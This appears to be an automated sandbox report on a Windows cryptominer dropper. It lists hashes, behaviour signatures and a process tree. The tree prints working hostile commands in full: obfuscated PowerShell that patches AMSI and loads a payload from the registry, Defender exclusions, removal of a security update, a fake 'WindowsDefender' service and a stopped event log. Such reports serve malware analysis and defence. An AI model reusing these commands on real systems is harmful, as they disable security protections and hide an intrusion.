Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    28/12/2024, 05:48

General

  • Target

    Haragon.exe

  • Size

    7.1MB

  • MD5

    d46351b9dd2d7343ac26100277d39ab5

  • SHA1

    337a5afd39cdd91c4816df3245ce7639b290913b

  • SHA256

    105bb07ccd7dad7b0e395a08372ce5467161ce13def69c248a4f9c164c624113

  • SHA512

    be3ac74e908f15bb0dea907cf620325372e3075ab9b7cdce653f95404348302bbc61bcc926fdd53b83c4d72136ba5dea12444cd19fc0d37e8bd9d3e90173efc2

  • SSDEEP

    196608:C9uMRRdKGI3F4nqzM7fzP2lWnVP6gskRLJxVNG9mnl4cG/U/e:UuUPkFRM3P2lWVPNL+9m+O/

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1044
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{a131b460-eba4-42e7-81de-4a54f4a9d497}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1120
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{7195159f-dc12-43d3-bb46-e096dee968a5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:640
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:972
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:412
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
              1⤵
              • Indicator Removal: Clear Windows Event Logs
              PID:436
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:884
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:940
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1104
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:1144
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1260
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:3204
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:qJZoxfZHmLNB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LyxsijJCFnuDTj,[Parameter(Position=1)][Type]$UhNvAcKdKK)$GcyylXCcQrt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'emo'+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$GcyylXCcQrt.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+'g'+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LyxsijJCFnuDTj).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$GcyylXCcQrt.DefineMethod(''+[Char](73)+''+'n'+'vok'+[Char](101)+'',''+'P'+'u'+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'lo'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$UhNvAcKdKK,$LyxsijJCFnuDTj).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+[Char](100)+'');Write-Output $GcyylXCcQrt.CreateType();}$CibhkYNmexfyh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+'t'+''+[Char](101)+'m.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+'n'+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+'at'+'i'+'v'+'e'+'Me'+[Char](116)+''+'h'+''+'o'+'d'+[Char](115)+'');$MfthwbBojWCRgn=$CibhkYNmexfyh.GetMethod('G'+'e'+'t'+[Char](80)+''+'r'+''+[Char](111)+''+'c'+'A'+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+'S'+''+'t'+'ati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TDDvGtqZEbGDIERGFCN=qJZoxfZHmLNB @([String])([IntPtr]);$mOKYWEotuhdOCaoZekFrtz=qJZoxfZHmLNB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zEPXLFoOqAd=$CibhkYNmexfyh.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$GOxqXEAeFavmMJ=$MfthwbBojWCRgn.Invoke($Null,@([Object]$zEPXLFoOqAd,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$tliasXmcCFkvjyZog=$MfthwbBojWCRgn.Invoke($Null,@([Object]$zEPXLFoOqAd,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+'l'+'P'+[Char](114)+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$eScMoQL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GOxqXEAeFavmMJ,$TDDvGtqZEbGDIERGFCN).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$pKFydHMxOOMPdjAXD=$MfthwbBojWCRgn.Invoke($Null,@([Object]$eScMoQL,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KFKuUXysZe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tliasXmcCFkvjyZog,$mOKYWEotuhdOCaoZekFrtz).Invoke($pKFydHMxOOMPdjAXD,[uint32]8,4,[ref]$KFKuUXysZe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pKFydHMxOOMPdjAXD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tliasXmcCFkvjyZog,$mOKYWEotuhdOCaoZekFrtz).Invoke($pKFydHMxOOMPdjAXD,[uint32]8,0x20,[ref]$KFKuUXysZe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3168
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:BtGNpArxMUGp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ulcXCNhliNVLnr,[Parameter(Position=1)][Type]$DLfMZVsbpr)$XboridhuMQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'P'+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+'Se'+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$XboridhuMQc.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'ec'+'i'+''+[Char](97)+'l'+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+','+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ulcXCNhliNVLnr).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$XboridhuMQc.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+'yS'+'i'+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+'t'+''+','+'Virt'+[Char](117)+'a'+[Char](108)+'',$DLfMZVsbpr,$ulcXCNhliNVLnr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'i'+'m'+''+'e'+',Mana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $XboridhuMQc.CreateType();}$kfdnnnjQNlLsA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'in'+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+[Char](102)+''+'e'+'Na'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$BtDrwrMvmKEypu=$kfdnnnjQNlLsA.GetMethod('G'+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'re'+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'lic'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JAeFebsbSVDxnpqIeck=BtGNpArxMUGp @([String])([IntPtr]);$gGYOfAgoBHOdtaACJKCMTe=BtGNpArxMUGp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CKtPekevvVU=$kfdnnnjQNlLsA.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+'l'+'l')));$nRhUUOzqAfQiih=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$CKtPekevvVU,[Object](''+'L'+'oad'+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+'A')));$nGtddwfgysPvFADcj=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$CKtPekevvVU,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$FRyFQWR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nRhUUOzqAfQiih,$JAeFebsbSVDxnpqIeck).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$QWDwIuvLCRVHsCImz=$BtDrwrMvmKEypu.Invoke($Null,@([Object]$FRyFQWR,[Object](''+[Char](65)+'m'+[Char](115)+'i'+'S'+''+[Char](99)+'anB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$dpRZLqoKji=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nGtddwfgysPvFADcj,$gGYOfAgoBHOdtaACJKCMTe).Invoke($QWDwIuvLCRVHsCImz,[uint32]8,4,[ref]$dpRZLqoKji);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QWDwIuvLCRVHsCImz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nGtddwfgysPvFADcj,$gGYOfAgoBHOdtaACJKCMTe).Invoke($QWDwIuvLCRVHsCImz,[uint32]8,0x20,[ref]$dpRZLqoKji);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+[Char](97)+'le'+[Char](114)+'st'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3212
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:3892
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1348
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1356
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1392
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1440
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1544
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1568
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2996
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1628
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1640
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1752
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1788
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1864
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2000
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1156
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1684
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2112
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:2156
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2256
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2336
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2504
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2656
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2664
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2736
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2792
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2808
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2828
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2840
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2356
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2684
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3244
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3568
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:3656
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Haragon.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Haragon.exe"
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1524
                                                                                          • C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1712
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe"
                                                                                            3⤵
                                                                                            • Drops file in Drivers directory
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4044
                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4452
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1728
                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                5⤵
                                                                                                  PID:1592
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                4⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2788
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                4⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4988
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                4⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1880
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                4⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2456
                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                C:\Windows\system32\dialer.exe
                                                                                                4⤵
                                                                                                  PID:2928
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe delete "WindowsDefender"
                                                                                                  4⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:220
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
                                                                                                  4⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2252
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                                  4⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2872
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe start "WindowsDefender"
                                                                                                  4⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:820
                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                              2⤵
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
